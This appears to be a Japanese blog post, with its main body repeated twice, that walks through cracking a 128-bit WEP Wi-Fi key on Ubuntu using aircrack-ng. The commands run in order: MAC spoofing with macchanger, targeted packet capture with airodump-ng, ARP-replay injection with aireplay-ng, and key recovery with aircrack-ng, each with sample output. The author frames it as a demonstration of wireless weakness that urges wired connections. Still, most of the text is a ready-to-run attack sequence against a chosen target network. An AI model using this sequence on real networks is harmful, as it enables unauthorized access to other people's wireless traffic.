今回のUbuntuの更新でカーネルも 2.6.27.-7generic に更新されたので今まで出来なかった 内蔵無線LANカード Intel(R) Wireless WiFi Link 4965AGN での Injection ができるのではと思いトライしましたが失敗しましたが Buffalo WLI-U2-SG54HP では 解読が早くなって WEP (128bit) がたったの1分45秒で解読されるので紹介します 目的は無線LAN Securityの脆弱性を認識し 重要なやり取りは有線を使う事 及び無線LANを使わない時は電源を切る等の安全対策をお勧めするのが目的です。
今回行ったのは
システム==>アップデート・マネージャーでプログラム aircrack-ng 1:1.0~rc1-2ubuntu1 のインストール
USB無線LAN BUFFALO WLI-U2-SG54HP ドライバーのインストール この解説 に従えば簡単に出来ますが sudo make の後に sudo make install をお忘れなく。
後はアプリケーション==>端末==>を三つ出してそれぞれ sudo -i と打ってパスを入れて全て root で操作します。
①パケット収集
****@ubuntu:~$ sudo -i
[sudo]password for *****: *****
root@ubuntu:~# airmon-ng stop wlan1
Interface Chipset Driver
wlan0 iwlagn - [phy0]
wlan1 Ralink USB rt73 (monitor mode disabled)
root@ubuntu:~# macchanger --mac 00:11:22:33:44:66 wlan1 ==>一応自分のMACをフェイクします
Current MAC: **:**:**:**:**:** (unknown)
Faked MAC: 00:11:22:33:44:66 (Cimsys Inc)
root@ubuntu:~# airmon-ng start wlan1
root@ubuntu:~# airodump-ng wlan1 ==>ターゲットのチャンネル番号、MACアドレス、AP名前を調べコピーしたら Ctrl+c (Cancel)
root@ubuntu:~# airodump-ng -c チャンネル番号 -w output --bssid MACアドレス wlan1 == >このまま待つ
②インジェクション
root@ubuntu:~# aireplay-ng -1 0 -a MACアドレス -h 00:11:22:33:44:66 -e ネットワーク名 wlan1
07:01:45 Waiting for beacon frame (BSSID: MACアドレス) on channel *
07:01:45 Sending Authentication Request (Open System)
07:01:45 Authentication successful
07:01:45 Sending Association Request
07:01:45 Association successful :-) (AID: 1)
root@ubuntu:~# aireplay-ng -3 -b MACアドレス -h 00:11:22:33:44:66 wlan1 ==>このまま待つ
Injectionが成功すると急激にパケットが集まる
③解析
root@ubuntu:~# aircrack-ng -n 128 -b MACアドレス output-*.cap == > このまま待つ
iVsパケットがある程度 (5,000) 溜まると自動的にパスが解析される。
自分の無線LANの信頼性をテストする事も必要ではないでしょうか?
以上 参考までです。
今回行ったのは
システム==>アップデート・マネージャーでプログラム aircrack-ng 1:1.0~rc1-2ubuntu1 のインストール
USB無線LAN BUFFALO WLI-U2-SG54HP ドライバーのインストール この解説 に従えば簡単に出来ますが sudo make の後に sudo make install をお忘れなく。
後はアプリケーション==>端末==>を三つ出してそれぞれ sudo -i と打ってパスを入れて全て root で操作します。
①パケット収集
****@ubuntu:~$ sudo -i
[sudo]password for *****: *****
root@ubuntu:~# airmon-ng stop wlan1
Interface Chipset Driver
wlan0 iwlagn - [phy0]
wlan1 Ralink USB rt73 (monitor mode disabled)
root@ubuntu:~# macchanger --mac 00:11:22:33:44:66 wlan1 ==>一応自分のMACをフェイクします
Current MAC: **:**:**:**:**:** (unknown)
Faked MAC: 00:11:22:33:44:66 (Cimsys Inc)
root@ubuntu:~# airmon-ng start wlan1
root@ubuntu:~# airodump-ng wlan1 ==>ターゲットのチャンネル番号、MACアドレス、AP名前を調べコピーしたら Ctrl+c (Cancel)
root@ubuntu:~# airodump-ng -c チャンネル番号 -w output --bssid MACアドレス wlan1 == >このまま待つ
②インジェクション
root@ubuntu:~# aireplay-ng -1 0 -a MACアドレス -h 00:11:22:33:44:66 -e ネットワーク名 wlan1
07:01:45 Waiting for beacon frame (BSSID: MACアドレス) on channel *
07:01:45 Sending Authentication Request (Open System)
07:01:45 Authentication successful
07:01:45 Sending Association Request
07:01:45 Association successful :-) (AID: 1)
root@ubuntu:~# aireplay-ng -3 -b MACアドレス -h 00:11:22:33:44:66 wlan1 ==>このまま待つ
Injectionが成功すると急激にパケットが集まる
③解析
root@ubuntu:~# aircrack-ng -n 128 -b MACアドレス output-*.cap == > このまま待つ
iVsパケットがある程度 (5,000) 溜まると自動的にパスが解析される。
自分の無線LANの信頼性をテストする事も必要ではないでしょうか?
以上 参考までです。